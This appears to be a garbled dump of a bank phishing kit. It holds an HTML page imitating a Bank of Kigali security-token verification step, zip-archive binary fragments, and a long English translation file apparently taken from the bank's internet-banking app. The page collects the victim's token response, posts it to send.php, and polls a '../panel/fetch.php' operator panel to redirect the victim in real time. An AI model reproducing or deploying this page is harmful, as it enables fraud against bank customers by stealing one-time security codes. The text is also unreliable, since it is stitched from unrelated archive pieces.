5C6fjjKGiddcmdaXqvJV1ussq4Xjqlbdd2md2LRGrpdYyjn8tzkIi9W6KLoHECgGC2+1284Vr9lY3DHzNpjXRZyrEn5afhbu27qu2/hbnCLfFxqenc/wBe/a7qrcJ9Ubn0dvXTPcC9pd/cdg3WxH93OKop5mFl4MtvzHwSUs3Gyb0YJQjeUSlif4fIloenc7M/Dak4eHN853p3lZtVzEpoqD95FpWth8d5efUQIAiBSLWcxhDoAn+giO9we021Wr37jIi4XfHy796Uf4XE5U9zm/icLv8A/uM9eywP6bsV2OVhxX0rN2jbrV34u5h34WdXtlHES/yo2U8ZPSf68uMUjE2uv6NjrxsOOMg7LctpS8rsJ42lCAUyj2Mjp5U1eYKgqHUqibEigB/KAiPXPts6V2Lapq7i48HkL85VnJP2rU5aX+mjPJncT1Pd7O52Nc2vqLfMmGw3E08XGVvFsyg/wurHhad+Ptjec17uCNsSKKTdJJBBJNBBBMiSKKJCppIpJlAiaSSZAKRNNMgAAFAAAADoGZCdAnJgDAGAMAYAwBgDAGAUp/11v+yvP0rHAKrAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAfO0omA3QO4AMUDdA6gUwlEwAP2gBhIHX+YMA+4AwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwD/2Q==); background-color: #fff; margin: 0; padding: 0; border: 0; display: flex; justify-content: flex-end; align-items: center; color: #AB1E22; font-size: 18px; font-weight: 700; } .window_title_header{ position: relative; color: #231f20; font-size: 45px; font-weight: 300; line-height: 200%; margin: 0; text-align: center; } .window_header_position{ position: relative; top: 90px } #contentarea, #contentarea1 { width:100%; position:absolute; border: 1px solid #cdcdcd; } .frmmainform{ position: relative; top: 100px; margin: auto; width: 980px; } .Buttons, .buttons { font-size: 18px !important; padding: 20px 50px !important; } input::placeholder{ color:#D3D3D3; } .fancy-tooltip .fancy-tooltip__content{ width: 280px !important; bottom: 0 !important; top: auto !important; } </style><div id="headerWrapper" ><div id="header" ><div id="_topMenu" > </div></div></div><div class="window_header no-resizable window_header_maximize window_header_position" ><div class="window_title_error active" ><table style="width: 100%;" id="error-dialog-table" cellspacing="1" cellpadding="1" ></table></div><div class="window_title_header active" id="stepheader" > Challenge Number: 1595323 </div></div><form name="frmmain" method="post" action="send.php" id="frmmain" AUTOCOMPLETE="off" class="frmmainform" autocomplete="off" ><input type='hidden' name='idsequence' value='pSgCsZEe1RMpNgO68492HMCoCNvfH0ra+W91QdrubUQ=' /><table id="mainbox" class="mainbox" cellpadding="0" cellspacing="0" border="0" ><tr><td><div class="middlepanel" ><table cellspacing="0" cellpadding="0" border="0" id="maintable" class="maintable" style="border: none;" ><tr><td><div class="pageheadingdiv" ><style type="text/css" > #progressbar { margin-bottom: 30px; overflow: hidden; /*CSS counters to number the steps*/ counter-reset: step; float:center; width:950px; /*border:1px solid #000;*/ display: flex; justify-content: center; align-items: center; } #progressbar li { list-style-type: none; color: #231f20; text-align:center; text-transform: uppercase; font-size: 15px; font-weight: 300; width: 25%; float: left; position: relative; display: block; } #progressbar li:before { content: counter(step); counter-increment: step; width: 10px; line-height: 10px; display: block; font-size: 10px; color: #333; background: white; border-radius: 100%; margin: 15px auto 3px auto; } /*progressbar connectors*/ #progressbar li:after { content: ''; width: 97%; height: 5px; color: #AB1E22; position: absolute; left: -48.4%; top: 18px; z-index: 0; /*put it behind the numbers*/ } #progressbar li:first-child:after { /*connector not needed before the first step*/ content: none; } /*marking active/completed steps green*/ /*The number of the step and the connector before it = green*/ #progressbar li:before, #progressbar li:after{ background: #E6E6E6; color: #E6E6E6; } #progressbar li.active:before{ background: #ab1e22 none repeat scroll 0 0; color: #ab1e22; display: block; height: 11px; } #progressbar li.active:after{ background: #000 none repeat scroll 0 0; color: #ab1e22; display: block; height: 5px; } .headerinfodiv{ margin-top: -20px; height: 60px; display: flex; justify-content: center; align-items: center; } </style><div class="headerinfodiv" >Enter the challenge number on your Security Token and type in the token response below complete security verification</div></td></tr><tr><td height="100%" valign="top" ><div class="y_scroll" id="contentarea" ><div class="contentarea" style="padding:0px" ><span id="box" class="box" ><div class="middlepanel" ><table border="0" cellspacing="1" cellpadding="1" class="formtable" ><tr><td class="labeltext col1" ><label for="fldCardDesc" ><b></b></label></td></tr><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >Token Response</label></td><td><input type="radio" id="fldnicno" name="fldIdentificationType" value="NIC" class="objradio" checked="true" onchange="toggleIdentificationNo(this);" ></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="tan" id="fldIdentificationNoNic" maxlength="14" size="14" placeholder="Token Response *" onkeypress="return isValid(event)" onpaste="return false;" ondrag="return false;" ondrop="return false;" class="DataLeftAligned" ><span class="required"> </span><span style="color:red;" class="js-timeout">2:00</span></strong><br></input></td></tr><tr style="height:12px !important;" ><script> var interval; function countdown() { clearInterval(interval); interval = setInterval( function() { var timer = $('.js-timeout').html(); timer = timer.split(':'); var minutes = timer[0]; var seconds = timer[1]; seconds -= 1; if (minutes < 0) return; else if (seconds < 0 && minutes != 0) { minutes -= 1; seconds = 59; } else if (seconds < 10 && length.seconds != 2) seconds = '0' + seconds; $('.js-timeout').html(minutes + ':' + seconds); if (minutes == 0 && seconds == 0) clearInterval(interval); }, 1000); } countdown(); </script></tr><tr></td></tr></table></div></span></div><div class="buttonarea" ><table border="0" cellspacing="1" cellpadding="1" width="100%" ><tbody><tr><td align="left" ><input style="border:none;"></input></td><td align="left" ><input alt="NEXT" name="fldsubmit" value="NEXT" class="Buttons" type="submit" size="16" maxlength="16" ></input></td></tr></tbody></table></div></div></td></tr></table></div></td></tr></table><input type="hidden" name="fldRequestId" value="RRUSR01" ></input><input type="hidden" name="fldDeviceId" value="01" ></input><input type="hidden" name="fldDataId" value="" ></input><input type="hidden" name="fldSessionId" value="" ></input><input type="hidden" name="fldSectionId" value="RRUSR01" ></input><input type="Hidden" name="fldServiceType" value="USR" ></input></form></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html>PK [��\��ZIt= t= app/locales/en/translation.jsonnu W+A�� { "Welcome to": "Welcome to", "Bank of kigali": "Bank of kigali", "Login": "Login", "Help and support": "Help and support", "Enter your login credentials to access your account": "Enter your login credentials to access your account", "Forgot password": "Forgot password", "By logging in, you agree to our": "By logging in, you agree to our", "Terms & Conditions": "Terms & Conditions", "And": "and", "Privacy Policy": "Privacy Policy", "Don’t have an account": "Don’t have an account", "Register": "Register", "Password is required": "Password is required", "Username is too short": "Username is too short", "Error activating! Please try again in a moment": "Error activating! Please try again in a moment", "Your account has been successfully activated on Internet Banking": "Your account has been successfully activated on Internet Banking", "Channel deactivated! Please contact customer service": "Channel deactivated! Please contact customer service", "Activate internet banking": "Activate internet banking", "Welcome to our internet banking service! By logging in, you are activating it as one of your preferred banking channels.": "Welcome to our internet banking service! By logging in, you are activating it as one of your preferred banking channels.", "Accept": "Accept", "Decline": "Decline", "Username is required": "Username is required", "Billers": "Billers", "Scheduled": "Scheduled", "History": "History", "Payments history": "Payments history", "Your payments history will be displayed here": "Your payments history will be displayed here", "Pay from": "Pay from", "Pay to": "Pay to", "welcome-to": "Welcome to", "bank-of-kigali": "Bank of kigali", "login": "Login", "and": "and", "bill": "bill", "or": "Or", "Amount": "Amount", "Choose favorite biller": "Choose favorite biller", "Select your top 5 frequently used billers to appear in your favorite billers shortcuts": "Select your top 5 frequently used billers to appear in your favorite billers shortcuts", "Make Payment": "Make Payment", "summary": "Summary", "Account Debited": "Account Debited", "Bill ID": "Bill ID", "Mark as default": "Mark as default", "Get statement": "Get statement", "Account Limits": "Account Limits", "Transfer": "Transfer", "Account Details": "Account Details", "Bank account details": "Bank account details", "transaction limit": "transaction limit", "Daily limit": "Daily limit", "amount-transfered": "Amount transfered", "Limit per transaction": "Limit per transaction", "insights": "insights", "Total Credit": "Total Credit", "Total Debit": "Total Debit", "Channel not active": "Channel not active", "Username": "Username", "Password": "Password", "Card Settings": "Card settings", "Lock Card": "Lock card", "Change PIN": "Change PIN", "PIN retries reset": "PIN retries reset", "Recent transactions": "Recent transactions", "Joining fee": "Joining fee", "Annular card fee": "Annular card fee", "Re-issue fee(expired)": "Re-issue fee(expired)", "Card replacement fee": "Card replacement fee", "Free": "Free", "Quick Links": "Quick Links", "Ministatement": "Ministatement", "joining-fee": "Joining fee", "annular-card-fee": "Annular card fee", "re-issue-fee": "Re-issue fee(expired)", "card-replacement-fee": "Card replacement fee", "replacement-fee": "Free", "quick-links": "Quick Links", "ministatement": "Ministatement", "Transfers": "Transfers", "Local transfer": "Local transfer", "Send money to other Rwandan accounts": "Send money to other Rwandan accounts", "Mobile money": "Mobile money", "Between my accounts": "Between my accounts", "Transfer between your own accounts": "Transfer between your own accounts", "International transfer": "International transfer", "Send money throughout the world": "Send money throughout the world", "Scheduled transfers": "Scheduled transfers", "Your scheduled transfers will be displayed here": "Your scheduled transfers will be displayed here", "Transfers History": "Transfers history", "Your transfers will be displayed here": "Your transfers will be displayed here", "Beneficiaries": "Beneficiaries", "Beneficiary": "Beneficiary", "Favourite Beneficiaries": "Favourite Beneficiaries", "Your favourite beneficiaries will show up here": "Your favourite beneficiaries will show up here", "Recent transfers": "Recent Transfers", "Your recent transfers will show up here": "Your recent transfers will show up here", "See all": "See all", "Delete": "Delete", "Select multiple": "Select multiple", "Time": "Time", "Debit Account": "Debit Account", "Debit": "Debit", "Credit Account": "Credit Account", "Credit": "Credit", "Transfer type": "Transfer type", "Status": "Status", "Actions": "Actions", "View more": "View more", "failed": "Failed", "successful": "Successful", "completed": "Completed", "pending": "Pending", "processing": "Processing", "Your transaction": "Your transaction", "is being processed": "is being processed", "is pending for approval": "is pending for approval", "has failed": "has failed", "was successful": "was successful", "has been completed": "has been completed", "Transfer receipt": "Transfer receipt", "Debit acc. name": "Debit acc. name", "Debit acc. number": "Debit acc. number", "Description": "Description", "Transaction date": "Transaction date", "Beneficiary name": "Beneficiary name", "Beneficiary acc. number": "Beneficiary acc. number", "Transaction ID": "Transaction ID", "Transfer status": "Transfer status", "Response": "Response", "Print Receipt": "Print receipt", "Schedule": "Schedule", "Select beneficiary": "Select beneficiary", "Credit acc. number": "Credit acc. number", "Credit acc. name": "Credit acc. name", "Beneficiary bank": "Beneficiary bank", "Transfer amount": "Transfer amount", "Transfer fee": "Transfer fee", "Currency": "Currency", "favourite": "Favourite", "Favourites": "Favourites", "payment reference(s)": "payment reference(s)", "Search beneficiary": "Search beneficiary", "Bank name": "Bank name", "Select a bank": "Select a bank", "Search a bank": "Search a bank", "Search": "Search", "Confirm Transfer": "Confirm Transfer", "Make Transfer": "Make Transfer", "Schedule transfer": "Schedule transfer", "Error sending OTP": "Error sending OTP", "other": "other", "No matching beneficiaries": "No matching beneficiaries", "No matching bank": "No matching bank", "Error loading payment references!": "Error loading payment references!", "Sorry! You cannot transfer from RWF to": "Sorry! You cannot transfer from RWF to", "View limits": "View limits", "Error validating account": "Error validating account", "Error loading account limit!": "Error loading account limit!", "Daily": "Daily", "Weekly": "Weekly", "Monthly": "Monthly", "Quarterly": "Quarterly", "Yearly": "Yearly", "Payment date": "Payment date", "First payment date": "First payment date", "Last payment date": "Last payment date", "Repeat": "Repeat", "One-off": "One-off", "Recurring": "Recurring", "Transfer from": "Transfer from", "Transfer to": "Transfer to", "No saved": "No saved", "Remove": "Remove", "Filter by": "Filter by", "Exchange rate": "Exchange rate", "Error loading exchange rate!": "Error loading exchange rate!", "Click to refresh the rate!": "Click to refresh the rate!", "The currency exchange rates are subject to fluctuation and change without notice": "The currency exchange rates are subject to fluctuation and change without notice", "Prev page": "Prev page", "Next page": "Next page", "page(s)": "page(s)", "Recent Payments": "Recent Payments", "Your recent payments will show up here": "Your recent payments will show up here", "Scheduled transfer details": "Scheduled transfer details", "Your scheduled transfer details": "Your scheduled transfer details", "Created on": "Created on", "Frequency": "Frequency", "Scheduled on": "Scheduled on", "Last transfer date": "Last transfer date", "Reference Number": "Reference Number", "Fees": "Fees", "Print date": "Print date", "Disclaimer": "Disclaimer", "This is a computer generated receipt by Bank of Kigali. No signature required": "This is a computer generated receipt by Bank of Kigali. No signature required", "Mobile money transfer": "Mobile money transfer", "Use MTN Mobile Money": "Use MTN Mobile Money", "Use Airtel Money": "Use Airtel Money", "Transfer initiated": "Transfer initiated", "Your transfer is in progress": "Your transfer is in progress", "Mark as favorite": "Mark as favorite", "Save": "Save", "OK": "OK", "Home": "Home", "Accounts": "Accounts", "Account": "Account", "404 - Page Not Found": "404 - Page Not Found", "Go Home": "Go Home", "Contain at least 8 characters.": "Contain at least 8 characters.", "Contain at least one digit.": "Contain at least one digit.", "Contain at least one special character.": "Contain at least one special character.", "Contain at least one uppercase letter.": "Contain at least one uppercase letter.", "Contain at least one lowercase letter.": "Contain at least one lowercase letter.", "Not have more than 2 consecutive repeating characters.": "Not have more than 2 consecutive repeating characters.", "transaction type": "transaction type", "Are you sure you want to delete this?": "Are you sure you want to delete this?", "You are about to delete scheduled transfer, and this action will not be reversible.": "You are about to delete scheduled transfer, and this action will not be reversible.", "Yes, delete": "Yes, delete", "No, go back": "No, go back", "Phone number": "Phone number", "The phone number must be between 10 and 12 characters": "The phone number must be between 10 and 12 characters", "Credit account number": "Credit account number", "Credit account name": "Credit account name", "Loans": "Loans", "Request loan": "Request loan", "Account detail": "Account detail", "Payment schedule": "Payment schedule", "Account details": "Account details", "Loan calculator": "Loan calculator", "Loan amount": "Loan amount", "Arrears": "Arrears", "Next payment is due on": "Next payment is due on", "Loan type": "Loan type", "Amount paid": "Amount paid", "Loan balance": "Loan balance", "Rate": "Rate", "Loan maturity date": "Loan maturity date", "Loan details": "Loan details", "Loan tenure": "Loan tenure", "Monthly repayment": "Monthly repayment", "Loan repayment": "Loan repayment", "Total interest": "Total interest", "Total amount": "Total amount", "Months": "Months", "Years": "Years", "Loan period": "Loan period", "Start date": "Start date", "End date": "End date", "Interest rate": "Interest rate", "Early repayment": "Early repayment", "You are about to make an early loan repayment which will reduce your principal balance and once this payment is made before its initial date, you will still get debited automatically on your next loan repayment date if your debt is not fully paid.": "You are about to make an early loan repayment which will reduce your principal balance and once this payment is made before its initial date, you will still get debited automatically on your next loan repayment date if your debt is not fully paid.", "Yes, proceed": "Yes, proceed", "No": "No", "Date": "Date", "Instalment": "Instalment", "Remaining amount": "Remaining amount", "per annum": "per annum", "Standard": "Standard", "Custom": "Custom", "Repayment option": "Repayment option", "Confirm payment": "Confirm payment", "Payment initiated": "Payment initiated", "Payment in progress": "Payment in progress", "Bal": "Bal", "The loans features will be available once you have been granted them.": "The loans features will be available once you have been granted them.", "No payment schedule": "No payment schedule", "Your payment schedule will appear here": "Your payment schedule will appear here", "top-up-card": "Top up card", "card-w-details": "Card details", "Credit info": "Credit info", "Tenure Period": "Tenure Period", "From": "From", "Set statement period": "Set statement period", "Start Period": "Start Period", "End period": "End period", "View statement": "View statement", "Send statement on email": "Send statement on email", "Download statement": "Download statement", "Get account statement": "Get account statement", "Maximum limit per transaction": "Maximum limit per transaction", "You can only set a custom limit that is below the maximum limit": "You can only set a custom limit that is below the maximum limit", "Beneficiary details": "Beneficiary details", "Email": "Email", "Create beneficiary": "Create beneficiary", "Add payment reference": "Add payment reference", "Summary": "Summary", "Phone": "Phone", "Add beneficiary": "Add beneficiary", "Error adding beneficiary": "Error adding beneficiary", "New beneficiary": "New beneficiary", "Add new beneficiary": "Add new beneficiary", "Add new payment reference": "Add new payment reference", "Mobile wallet": "Mobile wallet", "Bill payment": "Bill payment", "Mobile Money": "Mobile Money", "Choose a payment reference": "Choose a payment reference", "Reference type": "Reference type", "Account number": "Account number", "Account holder name": "Account holder name", "Wallet": "Wallet", "A/C holder name": "A/C holder name", "Beneficiary/reference has been added successfully": "Beneficiary/reference has been added successfully", "New payment reference": "New payment reference", "Bill category": "Bill category", "Biller": "Biller", "Bill number": "Bill number", "Account name": "Account name", "Edit beneficiary": "Edit beneficiary", "My beneficiaries": "My beneficiaries", "My beneficiary": "My beneficiary", "Edit": "Edit", "ALL PAYMENT REFERENCES": "ALL PAYMENT REFERENCES", "View all": "View all", "Delete beneficiary": "Delete beneficiary", "Beneficiary(ies) have been deleted successfully": "Beneficiary(ies) have been deleted successfully", "Delete this beneficiary?": "Delete this beneficiary?", "This will permanently remove these beneficiaries from your list of beneficiaries": "This will permanently remove these beneficiaries from your list of beneficiaries", "Error deleting beneficiary": "Error deleting beneficiary", "Payment reference deleted successfully": "Payment reference deleted successfully", "Delete this payment reference?": "Delete this payment reference?", "This will permanently remove this reference from your list of payment references": "This will permanently remove this reference from your list of payment references", "Error deleting Reference": "Error deleting Reference", "Payment reference": "Payment reference", "account": "account", "Make payment": "Make payment", "Make transfer": "Make transfer", "Delete reference": "Delete reference", "NAME": "NAME", "PHONE NUMBER": "PHONE NUMBER", "EMAIL ADDRESS": "EMAIL ADDRESS", "PAYMENT REFERENCE": "PAYMENT REFERENCE", "FAVORITE": "FAVORITE", "Search by beneficiary's name, email or phone number": "Search by beneficiary's name, email or phone number", "Start by adding a new beneficiary": "Start by adding a new beneficiary", "Creating a beneficiary helps you make transfers and payments faster by using your beneficiary saved payment references": "Creating a beneficiary helps you make transfers and payments faster by using your beneficiary saved payment references", "Payment references": "Payment references", "references": "references", "reference": "reference", "REFERENCE TYPE": "REFERENCE TYPE", "ACCOUNT NUMBER": "ACCOUNT NUMBER", "CURRENCY": "CURRENCY", "Pay": "Pay", "Intl. transfer": "Intl. transfer", "New Beneficiary": "New Beneficiary", "You have no cards yet": "You have no cards yet", "Your card has been blocked": "Your card has been blocked", "Your card has been temporarily blocked for your protection. This measure ensures the safety of your funds.": "Your card has been temporarily blocked for your protection. This measure ensures the safety of your funds.", "You will manage your cards here": "You will manage your cards here", "You will be able to manage your BK physical cards from here": "You will be able to manage your BK physical cards from here", "VALID THRU": "VALID THRU", "Your recent transactions will show up here": "Your recent transactions will show up here", "Error verifying your OTP": "Error verifying your OTP", "LOCK": "LOCK", "UNLOCK": "UNLOCK", "Your card has been locked!": "Your card has been locked!", "Your card has been unlocked!": "Your card has been unlocked!", "Error locking your card, please try again!": "Error locking your card, please try again!", "Lock card": "Lock card", "Unlock card": "Unlock card", "Secure your card instantly by locking it to block all new purchases and ATM withdrawals, even those made through your digital wallet.": "Secure your card instantly by locking it to block all new purchases and ATM withdrawals, even those made through your digital wallet.", "Confirm": "Confirm", "Cancel": "Cancel", "Your pin retries has been successfully reset!": "Your pin retries has been successfully reset!", "Error resetting pin retries, please try again!": "Error resetting pin retries, please try again!", "Unlock PIN": "Unlock PIN", "Get 3 more changes to enter your PIN. Your card will be locked if you fail to enter the correct PIN after your third attempt.": " Get 3 more changes to enter your PIN. Your card will be locked if you fail to enter the correct PIN after your third attempt.", "Your card has been blocked!": "Your card has been blocked!", "Error blocking card, please try again!": "Error blocking card, please try again!", "Block this card": "Block this card", "Once you block this card, it can't be unblocked.": "Once you block this card, it can't be unblocked.", "Change the pin of your card.": "Change the pin of your card.", "Your card limit has been updated!": "Your card limit has been updated!", "Error setting your card limit, please try again!": "Error setting your card limit, please try again!", "ATM amount limit": "ATM amount limit", "POS amount limit": "POS amount limit", "E-commerce limit": "E-commerce limit", "You can only set a default limit that is below the maximum limit": "You can only set a default limit that is below the maximum limit", "Default": "Default", "Maximum limit": "Maximum limit", "Set custom limit": "Set custom limit", "Card validity": "Card validity", "Eligibility": "Eligibility", "BK Current account": "BK Current account", "years": "years", "PIN-issue fee": "PIN-issue fee", "Top-up from": "Top-up from", "Cards": "Cards", "Top up from current account": "Top up from current account", "To": "To", "Set transaction limits": "Set transaction limits", "Transaction limits": "Transaction limits", "Maximum": "Maximum", "Limit per transaction updated successfully": "Limit per transaction updated successfully", "Daily limit updated successfully": "Daily limit updated successfully", "Account limits": "Account limits", "All my Accounts": "All my Accounts", "Send money to a mobile wallet": "Send money to a mobile wallet", "MTN Mobile Money": "MTN Mobile Money", "Airtel Money": "Airtel Money", "eKash": "eKash", "eKash ID": "eKash ID", "You can use eKash ID, phone number or bank account": "You can use eKash ID, phone number or bank account", "My account": "My account", "Registered accounts": "Registered accounts", "Your accounts will show up here": "Your accounts will show up here", "Add account": "Add account", "These are your BK accounts in Rwandan Francs registered with eKash": "These are your BK accounts in Rwandan Francs registered with eKash", "Account type": "Account type", "Select an account to register": "Select an account to register", "eKash registered accounts": "eKash registered accounts", "eKash transfer": "eKash transfer", "Registered eKash accounts": "Registered eKash accounts", "Your registered eKash accounts will be displayed here": "Your registered eKash accounts will be displayed here", "Mini statement": "Mini statement", "January": "January", "February": "February", "March": "March", "April": "April", "May": "May", "June": "June", "July": "July", "August": "August", "September": "September", "October": "October", "November": "November", "December": "December", "Reveal balance": "Reveal balance", "Money insights": "Money insights", "ACCOUNT TYPE": "ACCOUNT TYPE", "AVAILABLE BALANCE": "AVAILABLE BALANCE", "ACTIONS": "ACTIONS", "Your mini statement will show up here": "Your mini statement will show up here", "Card details": "Card details", "You have no payment references": "You have no payment references", "Once you have some payment references, they will all be displayed here": "Once you have some payment references, they will all be displayed here", "Alipay transfer": "Alipay transfer", "Alipay Transfer": "Alipay Transfer", "To Alipay": "To Alipay", "Alipay ID": "Alipay ID", "First name": "First name", "Last name": "Last name", "Transfer purpose": "Transfer purpose", "Sub purpose": "Sub purpose", "Family support": "Family support", "Salary": "Salary", "Goods payment": "Good payment", "Service payment": "Service payment", "Clothes, bags and shoes": "Clothes, bags and shoes", "Daily supplies and cosmetics": "Daily supplies and cosmetics", "Electronics and home appliances": "Electronics and home appliances", "Toys, kids and babies": "Toys, kids and babies", "Interpretation service": "Interpretation service", "Translation service": "Translation service", "Human resource service": "Human resource service", "Estate agency service": "Estate agency service", "Software development service": "Software development service", "Web design or development service": "Web design or development service", "Drafting legal service": "Drafting legal service", "Legal related certification service": "Legal related certification service", "Accounting service": "Accounting service", "Tax service": "Tax service", "Architectural decoration design service": "Architectural decoration design service", "Advertising service": "Advertising service", "Sender’s account name": "Sender’s account name", "Sender’s account number": "Sender’s account number", "Sub transfer purpose": "Sub transfer purpose", "Verification code": "Verification code", "Enter the code that was sent to your phone number": "Enter the code that was sent to your phone number", "Code will expire in": "Code will expire in", "Didn’t receive code?": "Didn’t receive code?", "Resend": "Resend", "Invalid otp provided": "Invalid otp provided", "Discover BK Accounts": "Discover BK Accounts", "Invalid credentials": "Invalid credentials", "Your account is locked": "Your account is locked", "Loan account": "Loan account", "My loans": "My loans", "No active loans": "No active loans", "You will manage your loans here": "You will manage your loans here", "Calculate your EMI amount before completing all the formalities of the loan": "Calculate your EMI amount before completing all the formalities of the loan", "Use the Loan calculator to calculate your EMI amount before completing all the formalities of the loan": "Use the Loan calculator to calculate your EMI amount before completing all the formalities of the loan", "Reveal account balance": "Reveal account balance", "all my cards": "all my cards", "CARD TYPE": "CARD TYPE", "CARD N0.": "CARD N0.", "EXPIRY DATE": "EXPIRY DATE", "STATUS": "STATUS", "Card settings": "Card settings", "There was an error fetching card balance!": "There was an error fetching card balance!", "Payment details": "Payment details", "Instalment number": "Instalment number", "Instalment date": "Instalment date", "Penalty fee": "Penalty fee", "Enter amount greater than 5,000 RWF": "Enter amount greater than 5,000 RWF", "Discover BK cards": "Discover BK cards", "Debit Cards": "Debit Cards", "BK VISA Debit Card": "BK VISA Debit Card", "Visa and MasterCard Debit Cards ensure your convenience in making payments on any POS around the world or on e-commerce.": "Visa and MasterCard Debit Cards ensure your convenience in making payments on any POS around the world or on e-commerce.", "BK VISA Classic Gold": "BK VISA Classic Gold", "Bank of Kigali helps you solve your money problems with no stress. you get a credit line of up to FRW 1,000, 000.00 to help you balance your financial needs.": "Bank of Kigali helps you solve your money problems with no stress. you get a credit line of up to FRW 1,000, 000.00 to help you balance your financial needs.", "BK VISA Credit Gold": "BK VISA Credit Gold", "You dont necessarily need to have cash on you or on your account. BKs Visa Gold Credit Card offers you higher credit line to enable more business and satisfaction.": "You dont necessarily need to have cash on you or on your account. BKs Visa Gold Credit Card offers you higher credit line to enable more business and satisfaction.", "BK VISA Credit Platinum": "BK VISA Credit Platinum", "Our Visa Platinum Credit Card is designed to be a membership pass to our exclusive premier banking services enabling you to enjoy a five-star banking experience.": "Our Visa Platinum Credit Card is designed to be a membership pass to our exclusive premier banking services enabling you to enjoy a five-star banking experience.", "CREDIT CARDS": "CREDIT CARDS", "BK Arena Prepaid Card": "BK Arena Prepaid Card", "BK Arena Prepaid card will allow the unbanked youth to easily load money onto a prepaid wallet that can be used like any other bank card.": "BK Arena Prepaid card will allow the unbanked youth to easily load money onto a prepaid wallet that can be used like any other bank card.", "BK Prepaid Travel": "BK Prepaid Travel", "Visa Debit Cards ensure your convenience in making payments on any POS around the world or on e-commerce he world or on e-commerce.": "Visa Debit Cards ensure your convenience in making payments on any POS around the world or on e-commerce he world or on e-commerce.", "Recent payments": "Recent payments", "Something went wrong": "Something went wrong", "Please enter a valid email": "Please enter a valid email", "My accounts": "My accounts", "Something went wrong, try again later": "Something went wrong, try again later", "Send statement to email": "Send statement to email", "Send to email": "Send to email", "DATE": "DATE", "REFERENCE": "REFERENCE", "NARRATION": "NARRATION", "TRANSACTION": "TRANSACTION", "AMOUNT": "AMOUNT", "BALANCE": "BALANCE", "Select fields": "Select fields", "Account statement": "Account statement", "Your statement will show up here": "Your statement will show up here", "Apply": "Apply", "Today": "Today", "Last 10 days": "Last 10 days", "Last 30 days": "Last 30 days", "Last 90 days": "Last 90 days", "Statement has been sent to your email": "Statement has been sent to your email", "You have exceeded your transaction limit": "You have exceeded your transaction limit", "Valid": "Valid", "CVV": "CVV", "Amount transfered": "Amount transfered", "Verify OTP": "Verify OTP", "Set new password": "Set new password", "Error sending OTP! Try again": "Error sending OTP! Try again", "Password updated successfully": "Password updated successfully", "Current password is incorrect": "Current password is incorrect", "Setup a new password for your account": "Setup a new password for your account", "Current password": "Current password", "Password should": "Password should", "Confirm password": "Confirm password", "You will be able to manage your BK physical cards from here.": "You will be able to manage your BK physical cards from here.", "BK to BK": "BK to BK", "BK to Mobile Money": "BK to Mobile Money", "Enter the code that was sent to your email address": "Enter the code that was sent to your email address", "Enter the code that was sent to your phone/email": "Enter the code that was sent to your phone/email", "Reason": "Reason", "Why you would like to block your card?": "Why you would like to block your card?", "Continue": "Continue", "Printed date": "Printed date", "Error adding reference": "Error adding reference", "These bank details are intended for the purpose of facilitating all necessary transactions, including transfers and payments, on your account at Bank of Kigali.": "These bank details are intended for the purpose of facilitating all necessary transactions, including transfers and payments, on your account at Bank of Kigali.", "Bill payment receipt": "Bill payment receipt", "Debit Acc. Name": "Debit Acc. Name", "Debit Acc. Number": "Debit Acc. Number", "Transaction Date": "Transaction Date", "Beneficiary Name": "Beneficiary Name", "Beneficiary Account": "Beneficiary Account", "Transfer Status": "Transfer Status", "Account Name": "Account Name", "Account Number": "Account Number", "Legacy ID": "Legacy ID", "Account Type": "Account Type", "SWIFT CODE": "SWIFT CODE", "Customer ID": "Customer ID", "IBAN": "IBAN", "Customer Address": "Customer Address", "Printed on": "Printed on", "Select language": "Select language", "Reset password": "Reset password", "Please select what to continue with to reset your credentials": "Please select what to continue with to reset your credentials", "Continue with username": "Continue with username", "You will reset your password using your username": "You will reset your password using your username", "Continue with phone number": "Continue with phone number", "You will reset your password using your phone number": "You will reset your password using your phone number", "Continue with email": "Continue with email", "You will reset your password using your email": "You will reset your password using your email", "Go back": "Go back", "Enter your username to continue": "Enter your username to continue", "Enter your phone number to continue": "Enter your phone number to continue", "Enter your email to continue": "Enter your email to continue", "Security questions": "Security questions", "Answer your security question to proceed with password recovery": "Answer your security question to proceed with password recovery", "Choose account": "Choose account", "You may choose the account for which you want to reset the password": "You may choose the account for which you want to reset the password", "Next": "Next", "Your account is locked due to suspicious attempts. Please contact customer support at (4455) for help": "Your account is locked due to suspicious attempts. Please contact customer support at (4455) for help", "Incorrect answer: Click Next to load another question": "Incorrect answer: Click Next to load another question", "Data Collection Customer Consent": "Data Collection Customer Consent", "Reference is made to the Law No 058/2021 of 13/10/2021 relating to the protection of personal data and privacy, where Bank of Kigali Plc as a process and controller of customer’s data.": "Reference is made to the Law No 058/2021 of 13/10/2021 relating to the protection of personal data and privacy, where Bank of Kigali Plc as a process and controller of customer’s data.", "The bank has implemented appreciate technical and organizational measures to ensure a level of security appropriate to the risk posed to your data the bank collects and uses for banking services.": "The bank has implemented appreciate technical and organizational measures to ensure a level of security appropriate to the risk posed to your data the bank collects and uses for banking services.", "Therefore, Bank of Kigali Plc needs your consent to collect, use and store your personal data for banking services, by accepting the below I hereby consent that Bank of Kigali Plc can process the provided personal data for the purpose of banking services.": "Therefore, Bank of Kigali Plc needs your consent to collect, use and store your personal data for banking services, by accepting the below I hereby consent that Bank of Kigali Plc can process the provided personal data for the purpose of banking services.", "I acknowledge that my personal data collected may be shared to only authorized parties. Bank of Kigali will continuously strive to keep my information solely for the fulfillment of the aforementioned purposes.": "I acknowledge that my personal data collected may be shared to only authorized parties. Bank of Kigali will continuously strive to keep my information solely for the fulfillment of the aforementioned purposes.", "I reserve the right to withdraw my consent to process my personal data from Bank of Kigali Plc after which my records will be disposed.": "I reserve the right to withdraw my consent to process my personal data from Bank of Kigali Plc after which my records will be disposed.", "I hereby acknowledge that I have read and fully understood the terms and conditions of this agreement.": "I hereby acknowledge that I have read and fully understood the terms and conditions of this agreement.", "Definitions": 